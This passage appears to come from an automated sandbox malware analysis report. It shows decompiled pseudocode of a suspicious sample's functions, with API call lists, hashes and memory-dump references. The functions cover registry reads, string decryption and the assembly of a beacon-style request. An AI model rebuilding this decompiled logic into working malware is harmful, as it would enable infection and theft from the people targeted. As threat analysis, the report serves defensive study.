				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x477a2d0; // 0x96d5a8
				_t4 = _t15 + 0x477b394; // 0x50e893c
				_t20 = _t4;
				_t6 = _t15 + 0x477b124; // 0x650047
				_t17 = E04777471(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E04774C7C(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x04774c09
0x04774c0b
0x04774c12
0x04774c13
0x04774c14
0x04774c15
0x04774c1b
0x04774c20
0x04774c20
0x04774c2a
0x04774c3c
0x04774c43
0x04774c72
0x04774c45
0x04774c4a
0x04774c6f
0x04774c4c
0x04774c4f
0x04774c56
0x04774c61
0x04774c58
0x04774c5b
0x04774c5b
0x04774c65
0x04774c65
0x04774c4a
0x04774c79

APIs

Part of subcall function 04777471: SysFreeString.OLEAUT32(?), ref: 04777550

Part of subcall function 04774C7C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,047777C1,004F0053,00000000,?), ref: 04774C85
Part of subcall function 04774C7C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,047777C1,004F0053,00000000,?), ref: 04774CAF
Part of subcall function 04774C7C: memset.NTDLL ref: 04774CC3

SysFreeString.OLEAUT32(00000000), ref: 04774C65

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: acddbbe763378c9a34207aad88910c8454c5eca527bb31eaaafab8208db6b8c8
Instruction ID: b33946556bc3c162375b48a3dd481ee0584b6dd478bb0b1539decfb0410b4ca0
Opcode Fuzzy Hash: acddbbe763378c9a34207aad88910c8454c5eca527bb31eaaafab8208db6b8c8
Instruction Fuzzy Hash: EB015E32600029BBDF11AFA4CD44DAEBBB9FB44754F804625EA51E6220E370AA59D791

Uniqueness

Uniqueness Score: -1.00%

Function 04775C4E, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04775C4E(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x477a290, 0, _a4); // executed
				return _t2;
			}

0x04775c5a
0x04775c60

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,04773FAA), ref: 04775C5A

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: dd1566cd8cdec36c88bdd0dae86ea96cebf18be4dbfa4f7b36871e071c0b4050
Instruction ID: d3acb774b4ff744fec7054c085a58b8c20c5cfc3804091016930d9092806eaaa
Opcode Fuzzy Hash: dd1566cd8cdec36c88bdd0dae86ea96cebf18be4dbfa4f7b36871e071c0b4050
Instruction Fuzzy Hash: ADB012B5514100ABEA024B00DE04FD97B22F794B00F40C410B30890060C2360C20EB05

Uniqueness

Uniqueness Score: -1.00%

Function 04772A03, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04772A03(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x477a290, 0, _a4); // executed
				return _t2;
			}

0x04772a0f
0x04772a15

APIs

RtlFreeHeap.NTDLL(00000000,00000000,04774072,00000000,?,?,00000000,?,?,?,?,?,?,047744AE,00000000), ref: 04772A0F

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 769445c19e3382ea5d9d9f4bca4bcda53a72b084f583076fc5c7dff575612dda
Instruction ID: b72e91eecde0e6322a5658ed787c4150e71a520963da24a458a4b981fe2b2f3c
Opcode Fuzzy Hash: 769445c19e3382ea5d9d9f4bca4bcda53a72b084f583076fc5c7dff575612dda
Instruction Fuzzy Hash: 2FB012B1114100EBEE024B00DE08F497B22F790B00F40C410B3041006082360C20EB14

Uniqueness

Uniqueness Score: -1.00%

Function 047730AD, Relevance: 1.3, APIs: 1, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E047730AD(void** __esi, intOrPtr _a4, unsigned int _a8, void* _a12) {
				signed short _t18;
				void* _t24;
				signed int _t26;
				signed short _t27;

				if(_a4 != 0) {
					_t18 = E04774BFF(_a4, _a8, _a12, __esi); // executed
					_t27 = _t18;
				} else {
					_t27 = E04775419(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t27 == 0) {
						_t26 = _a8 >> 1;
						if(_t26 == 0) {
							_t27 = 2;
							HeapFree( *0x477a290, 0, _a12);
						} else {
							_t24 = _a12;
							 *(_t24 + _t26 * 2 - 2) =  *(_t24 + _t26 * 2 - 2) & _t27;
							 *__esi = _t24;
						}
					}
				}
				return _t27;
			}

0x047730b5
0x0477310a
0x0477310f
0x047730b7
0x047730d1
0x047730d5
0x047730da
0x047730dc
0x047730ec
0x047730f8
0x047730de
0x047730de
0x047730e1
0x047730e6
0x047730e6
0x047730dc
0x047730d5
0x04773115

APIs

Part of subcall function 04775419: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,?,04772115,3D047790,80000002,04777319,00000000,04777319,?,65696C43,80000002), ref: 0477545B
Part of subcall function 04775419: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,65696C43,?,04772115,3D047790,80000002,04777319,00000000,04777319,?,65696C43), ref: 04775480
Part of subcall function 04775419: RegCloseKey.ADVAPI32(80000002,?,04772115,3D047790,80000002,04777319,00000000,04777319,?,65696C43,80000002,00000000,?), ref: 047754B0

HeapFree.KERNEL32(00000000,?,00000000,80000002,73BCF710,?,?,73BCF710,00000000,?,04774A79,?,004F0053,050E9338,00000000,?), ref: 047730F8

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: QueryValue$CloseFreeHeap
String ID:
API String ID: 2109406458-0
Opcode ID: 6d074682ab33e46ba847c62de78fe970cae60e59f8d0b83402de0ea0bb6706b5
Instruction ID: c9275ae2f2364ee4ed3613c8d5cc04fb062cf6167835e3411521f4791df64f55
Opcode Fuzzy Hash: 6d074682ab33e46ba847c62de78fe970cae60e59f8d0b83402de0ea0bb6706b5
Instruction Fuzzy Hash: BF011D32240649FBDF129F45CC46FAA3B66FB84350F95C829FE198A250D631E920EB50

Uniqueness

Uniqueness Score: -1.00%

Function 04775872, Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E04775872(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}

0x04775872
0x0477587f
0x04775880
0x04775881
0x04775888
0x047758b6
0x047758b7
0x047758ba
0x047758c0
0x00000000
0x00000000
0x0477589f
0x047758a9
0x047758b0
0x00000000
0x047758a1
0x047758a4
0x047758c4
0x047758a6
0x047758a6
0x00000000
0x047758a6
0x047758a4
0x047758cb
0x047758d1
0x047758d1
0x00000000

APIs

Sleep.KERNELBASE(000001F4), ref: 047758BA

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2aadafaf62e96775679761120b980c2916b82688856a38bc3f4986dce63d798f
Instruction ID: 3034a92553419a3a03d1b2106361122f8096e779dc081d7250d8c9f91452de35
Opcode Fuzzy Hash: 2aadafaf62e96775679761120b980c2916b82688856a38bc3f4986dce63d798f
Instruction Fuzzy Hash: E6F0F975D01218FFDF00DB95C888AEDB7B8EF05305F5488AAE502A7240E7B86B84DF65

Uniqueness

Uniqueness Score: -1.00%

Function 04771AF1, Relevance: 1.3, APIs: 1, Instructions: 36
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E04771AF1(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E047735A1( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E04775C4E(_a8 + _a8);
					if(_t21 != 0) {
						E04774502(_a4, _t21, _t23);
					}
					E04772A03(_a4);
				}
				return _t21;
			}

0x04771af9
0x04771b00
0x04771b02
0x04771b11
0x04771b18
0x04771b27
0x04771b2b
0x04771b32
0x04771b32
0x04771b3a
0x04771b3f
0x04771b44

APIs

lstrlen.KERNEL32(00000000,00000000,04776301,00000000,?,04775B47,00000000,04776301,?,00000000,04776301,00000000,050E9630), ref: 04771B02

Part of subcall function 047735A1: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,04771B16,00000001,04776301,00000000), ref: 047735D9
Part of subcall function 047735A1: memcpy.NTDLL(04771B16,04776301,00000010,?,?,?,04771B16,00000001,04776301,00000000,?,04775B47,00000000,04776301,?,00000000), ref: 047735F2
Part of subcall function 047735A1: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 0477361B
Part of subcall function 047735A1: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 04773633
Part of subcall function 047735A1: memcpy.NTDLL(00000000,00000000,050E9630,00000010), ref: 04773685

Part of subcall function 04775C4E: RtlAllocateHeap.NTDLL(00000000,00000000,04773FAA), ref: 04775C5A

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
String ID:
API String ID: 894908221-0
Opcode ID: e86e62622808e7f8e35b4ba63c1a7fa908fd0dbf771e5d4b6883e2d0323484bf
Instruction ID: 77b1beca4a68d8daabcd9290af21cbcec3daf7d7a413c92be387224efcb72b27
Opcode Fuzzy Hash: e86e62622808e7f8e35b4ba63c1a7fa908fd0dbf771e5d4b6883e2d0323484bf
Instruction Fuzzy Hash: E5F01276100109BBDF116F65DC04DEF7FADEF853A4B858022FD19DA220EA31EA55DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 047745E6, Relevance: 1.3, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E047745E6(void* __edx, void* __edi, void* _a4) {
				int _t7;
				int _t13;

				_t7 = E04771896(__edx, __edi, _a4,  &_a4); // executed
				_t13 = _t7;
				if(_t13 != 0) {
					memcpy(__edi, _a4, _t13);
					 *((char*)(__edi + _t13)) = 0;
					E04772A03(_a4);
				}
				return _t13;
			}

0x047745f2
0x047745f7
0x047745fb
0x04774602
0x0477460d
0x04774611
0x04774611
0x0477461a

APIs

Part of subcall function 04771896: memcpy.NTDLL(00000000,00000110,04771C1F,04771C1F,?,?,04771C1F,?,?,047724E4,?), ref: 047718CC
Part of subcall function 04771896: memset.NTDLL ref: 04771942
Part of subcall function 04771896: memset.NTDLL ref: 04771956

memcpy.NTDLL(04771C1F,04771C1F,00000000,04771C1F,04771C1F,04771C1F,?,?,047724E4,?,?,04771C1F,?), ref: 04774602

Part of subcall function 04772A03: RtlFreeHeap.NTDLL(00000000,00000000,04774072,00000000,?,?,00000000,?,?,?,?,?,?,047744AE,00000000), ref: 04772A0F

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpymemset$FreeHeap
String ID:
API String ID: 3053036209-0
Opcode ID: 7d9ae11f758df14eb32432736e3baa9f6ba8b53720bad78e7208944919bdcff0
Instruction ID: 18c4ed3e60f2aee9633f67e622fadf2adf6769b90f09984d748cdcf44b9e4cdd
Opcode Fuzzy Hash: 7d9ae11f758df14eb32432736e3baa9f6ba8b53720bad78e7208944919bdcff0
Instruction Fuzzy Hash: C6E08C368001287BDF226A94DC00EFB7F6CCF456E0F404020FE088A301E631E61097E1

Uniqueness

Uniqueness Score: -1.00%

Function 6C55F289, Relevance: 1.3, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?), ref: 6C55F2A4

Memory Dump Source

Source File: 00000003.00000002.920249299.000000006C55E000.00000040.00020000.sdmp, Offset: 6C55E000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d03c8ac24e77a378d574aeaa2564687c4a5ed2c0e67f4dce4add3046f7a40403
Instruction ID: 9ace2cff583cf89fb3179906299917247f21d23bc320736bd1c4fd9a3bee4b47
Opcode Fuzzy Hash: d03c8ac24e77a378d574aeaa2564687c4a5ed2c0e67f4dce4add3046f7a40403
Instruction Fuzzy Hash: A2E086321441119FDB15CF14CCB5B533796EB44350F1C0499ED09EF2C5EBF1380686A5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6C556F16, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 6C556F2D
_wcscmp.LIBCMT ref: 6C556F3E
GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,6C5571DC,?,00000000), ref: 6C556F5A
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,6C5571DC,?,00000000), ref: 6C556F84

Strings

OCP, xrefs: 6C556F38
ACP, xrefs: 6C556F27

Memory Dump Source

Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: InfoLocale_wcscmp
String ID: ACP$OCP
API String ID: 1351282208-711371036
Opcode ID: 2a4e325ac02cdef773ad5d00dbd437b3744d9c3fae12dd33acd9744fcb14c10e
Instruction ID: 814d534386a319738601c17fc51356a5642658c7b1dacc2b3072a1e2ccd1af0b
Opcode Fuzzy Hash: 2a4e325ac02cdef773ad5d00dbd437b3744d9c3fae12dd33acd9744fcb14c10e
Instruction Fuzzy Hash: C7019632619285BBEB008E59DC44FE637B89F05758F508017F504DAA54EF31DA91C795

Uniqueness

Uniqueness Score: -1.00%

Function 6C548B1A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,8hQl,6C54B7B8,?,?,?,00000001), ref: 6C548B1F
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 6C548B28

Strings

8hQl, xrefs: 6C548B1A

Memory Dump Source

Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: ExceptionFilterUnhandled
String ID: 8hQl
API String ID: 3192549508-3048985772
Opcode ID: 67758587fd8f2e06453831a10d73201833cc5d3484ebbf6b560d71359c1da25c
Instruction ID: 18f33c8217b0b065b46d8380693cd75c65a5a50e218b45ea735d35ef527fdd64
Opcode Fuzzy Hash: 67758587fd8f2e06453831a10d73201833cc5d3484ebbf6b560d71359c1da25c
Instruction Fuzzy Hash: 98B09236044248ABDE102B99D809BB83F78EB0A662F010011F64E448608B76A4908A91

Uniqueness

Uniqueness Score: -1.00%

Function 04776124, Relevance: 34.7, APIs: 23, Instructions: 220
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E04776124(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				intOrPtr _v40;
				void* __ecx;
				void* __edi;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				int _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t84;
				int _t87;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t92;
				int _t95;
				void* _t98;
				void* _t99;
				void* _t103;
				intOrPtr _t105;
				long _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				long _t110;
				int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;

				_t103 = __edx;
				_t110 = __eax;
				_v8 = 8;
				_t117 = RtlAllocateHeap( *0x477a290, 0, 0x800);
				if(_t117 != 0) {
					if(_t110 == 0) {
						_t110 = GetTickCount();
					}
					_t31 =  *0x477a018; // 0x5ffc1f8b
					asm("bswap eax");
					_t32 =  *0x477a014; // 0x5cb11ae7
					asm("bswap eax");
					_t33 =  *0x477a010; // 0x15dc9586
					asm("bswap eax");
					_t34 =  *0x477a00c; // 0x67522d90
					asm("bswap eax");
					_t35 =  *0x477a2d0; // 0x96d5a8
					_t2 = _t35 + 0x477b622; // 0x74666f73
					_t111 = wsprintfA(_t117, _t2, 2, 0x3d14c, _t34, _t33, _t32, _t31,  *0x477a02c,  *0x477a004, _t110);
					_t38 = E0477271A();
					_t39 =  *0x477a2d0; // 0x96d5a8
					_t3 = _t39 + 0x477b662; // 0x74707526
					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
					_t120 = _t118 + 0x38;
					_t112 = _t111 + _t42;
					if(_a12 != 0) {
						_t92 =  *0x477a2d0; // 0x96d5a8
						_t7 = _t92 + 0x477b66d; // 0x732526
						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
						_t120 = _t120 + 0xc;
						_t112 = _t112 + _t95;
					}
					_t43 = E04772956(_t99);
					_t44 =  *0x477a2d0; // 0x96d5a8
					_t9 = _t44 + 0x477b38a; // 0x6d697426
					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
					_t48 =  *0x477a2d0; // 0x96d5a8
					_t11 = _t48 + 0x477b33b; // 0x74636126
					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
					_t52 =  *0x477a328; // 0x50e95b0
					_t121 = _t120 + 0x1c;
					if(_t52 != 0) {
						_t88 =  *0x477a2d0; // 0x96d5a8
						_t13 = _t88 + 0x477b685; // 0x73797326
						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t91;
					}
					_t105 =  *0x477a37c; // 0x50e9630
					_a28 = E04775741(0x477a00a, _t105 + 4);
					_t55 =  *0x477a318; // 0x50e95e0
					_t107 = 0;
					if(_t55 != 0) {
						_t84 =  *0x477a2d0; // 0x96d5a8
						_t16 = _t84 + 0x477b8ea; // 0x3d736f26
						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t87;
					}
					_t56 =  *0x477a314; // 0x0
					if(_t56 != _t107) {
						_t81 =  *0x477a2d0; // 0x96d5a8
						_t18 = _t81 + 0x477b8c1; // 0x3d706926
						wsprintfA(_t114 + _t117, _t18, _t56);
					}
					if(_a28 != _t107) {
						_t98 = RtlAllocateHeap( *0x477a290, _t107, 0x800);
						if(_t98 != _t107) {
							E04771A51(GetTickCount());
							_t62 =  *0x477a37c; // 0x50e9630
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0x477a37c; // 0x50e9630
							__imp__(_t66 + 0x40);
							_t68 =  *0x477a37c; // 0x50e9630
							_t115 = E04775AE3(1, _t103, _t117,  *_t68);
							asm("lock xadd [eax], ecx");
							if(_t115 != _t107) {
								StrTrimA(_t115, 0x47792cc);
								_push(_t115);
								_t108 = E04772829();
								_v4 = _t108;
								if(_t108 != 0) {
									 *_t115 = 0;
									__imp__(_t98, _a8);
									_t109 = __imp__;
									 *_t109(_t98, _t108);
									 *_t109(_t98, _t115);
									_t78 = E04773B46(0xffffffffffffffff, _t98, _v12, _v8);
									_v40 = _t78;
									if(_t78 != 0 && _t78 != 0x10d2) {
										E04772813();
									}
									HeapFree( *0x477a290, 0, _v24);
								}
								HeapFree( *0x477a290, 0, _t115);
								_t107 = 0;
							}
							HeapFree( *0x477a290, _t107, _t98);
						}
						HeapFree( *0x477a290, _t107, _a20);
					}
					HeapFree( *0x477a290, _t107, _t117);
				}
				return _v16;
			}

0x04776124
0x04776138
0x0477613a
0x04776148
0x0477614c
0x04776154
0x0477615c
0x0477615c
0x0477615e
0x0477616a
0x04776179
0x0477617e
0x04776181
0x04776186
0x04776189
0x0477618e
0x04776191
0x0477619d
0x047761aa
0x047761ac
0x047761b2
0x047761b7
0x047761c2
0x047761c4
0x047761c7
0x047761cd
0x047761cf
0x047761d8
0x047761e3
0x047761e5
0x047761e8
0x047761e8
0x047761ea
0x047761f1
0x047761f6
0x04776203
0x04776205
0x0477620a
0x04776218
0x0477621a
0x0477621f
0x04776224
0x04776227
0x0477622c
0x04776237
0x04776239
0x0477623c
0x0477623c
0x0477623e
0x04776251
0x04776255
0x0477625a
0x0477625e
0x04776261
0x04776266
0x04776271
0x04776273
0x04776276
0x04776276
0x04776278
0x0477627f
0x04776282
0x04776287
0x04776291
0x04776293
0x0477629a
0x047762b2
0x047762b6
0x047762c2
0x047762c7
0x047762d0
0x047762e1
0x047762e5
0x047762ee
0x047762f4
0x04776301
0x0477630e
0x04776314
0x0477631c
0x04776322
0x04776328
0x0477632c
0x04776330
0x04776336
0x0477633a
0x04776341
0x04776348
0x0477634c
0x04776357
0x0477635e
0x04776362
0x0477636b
0x0477636b
0x0477637c
0x0477637c
0x0477638b
0x04776391
0x04776391
0x0477639b
0x0477639b
0x047763ac
0x047763ac
0x047763ba
0x047763ba
0x047763ca

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 04776142
GetTickCount.KERNEL32 ref: 04776156
wsprintfA.USER32 ref: 047761A5
wsprintfA.USER32 ref: 047761C2
wsprintfA.USER32 ref: 047761E3
wsprintfA.USER32 ref: 04776201
wsprintfA.USER32 ref: 04776216
wsprintfA.USER32 ref: 04776237
wsprintfA.USER32 ref: 04776271
wsprintfA.USER32 ref: 04776291
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 047762AC
GetTickCount.KERNEL32 ref: 047762BC
RtlEnterCriticalSection.NTDLL(050E95F0), ref: 047762D0
RtlLeaveCriticalSection.NTDLL(050E95F0), ref: 047762EE

Part of subcall function 04775AE3: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,04776301,00000000,050E9630), ref: 04775B0E
Part of subcall function 04775AE3: lstrlen.KERNEL32(00000000,?,00000000,04776301,00000000,050E9630), ref: 04775B16
Part of subcall function 04775AE3: strcpy.NTDLL ref: 04775B2D
Part of subcall function 04775AE3: lstrcat.KERNEL32(00000000,00000000), ref: 04775B38
Part of subcall function 04775AE3: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,04776301,?,00000000,04776301,00000000,050E9630), ref: 04775B55

StrTrimA.SHLWAPI(00000000,047792CC,00000000,050E9630), ref: 0477631C

Part of subcall function 04772829: lstrlen.KERNEL32(050E887A,00000000,00000000,00000000,04776328,00000000), ref: 04772839
Part of subcall function 04772829: lstrlen.KERNEL32(?), ref: 04772841
Part of subcall function 04772829: lstrcpy.KERNEL32(00000000,050E887A), ref: 04772855
Part of subcall function 04772829: lstrcat.KERNEL32(00000000,?), ref: 04772860

lstrcpy.KERNEL32(00000000,?), ref: 0477633A
lstrcat.KERNEL32(00000000,00000000), ref: 04776348
lstrcat.KERNEL32(00000000,00000000), ref: 0477634C
HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 0477637C
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0477638B
HeapFree.KERNEL32(00000000,00000000,00000000,050E9630), ref: 0477639B
HeapFree.KERNEL32(00000000,?), ref: 047763AC
HeapFree.KERNEL32(00000000,00000000), ref: 047763BA

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
String ID:
API String ID: 1837416118-0
Opcode ID: fa9fdbf5a6a18d869d646ef8d58b13527aa4d391d9aa0298b25f4755c65bf82e
Instruction ID: 62e916feef6e5f259bdd4a8a3753e70b379779794ce6c5a027f7bca0b8b30dbc
Opcode Fuzzy Hash: fa9fdbf5a6a18d869d646ef8d58b13527aa4d391d9aa0298b25f4755c65bf82e
Instruction Fuzzy Hash: 447192B2500205AFEB11DB68EC88DDA77ECFB88714B958915FA49D3211E63EEC05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6C54AF5D, Relevance: 18.1, APIs: 12, Instructions: 84COMMON

Download Yara Rule

APIs

RtlDecodePointer.NTDLL ref: 6C54AF65
_free.LIBCMT ref: 6C54AF7E

Part of subcall function 6C543F97: HeapFree.KERNEL32(00000000,00000000,?,6C54C47F,00000000,00000001,00000000,?,00000000,?,6C54493E,6C5421A2,?), ref: 6C543FAB
Part of subcall function 6C543F97: GetLastError.KERNEL32(00000000,?,6C54C47F,00000000,00000001,00000000,?,00000000,?,6C54493E,6C5421A2,?), ref: 6C543FBD

_free.LIBCMT ref: 6C54AF91
_free.LIBCMT ref: 6C54AFAF
_free.LIBCMT ref: 6C54AFC1
_free.LIBCMT ref: 6C54AFD2
_free.LIBCMT ref: 6C54AFDD
_free.LIBCMT ref: 6C54B001
RtlEncodePointer.NTDLL(6D569338), ref: 6C54B008
_free.LIBCMT ref: 6C54B01D
_free.LIBCMT ref: 6C54B033
_free.LIBCMT ref: 6C54B05B

Memory Dump Source

Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
String ID:
API String ID: 3064303923-0
Opcode ID: 857f3f2e5c1fb3e97b82c0fb2fb7555369422281dcf0b5be781c8162136dce4e
Instruction ID: 912bdc1ad3590a5045c857e35203e4f4a1a18632b5009ce8b51b050db4ff889a
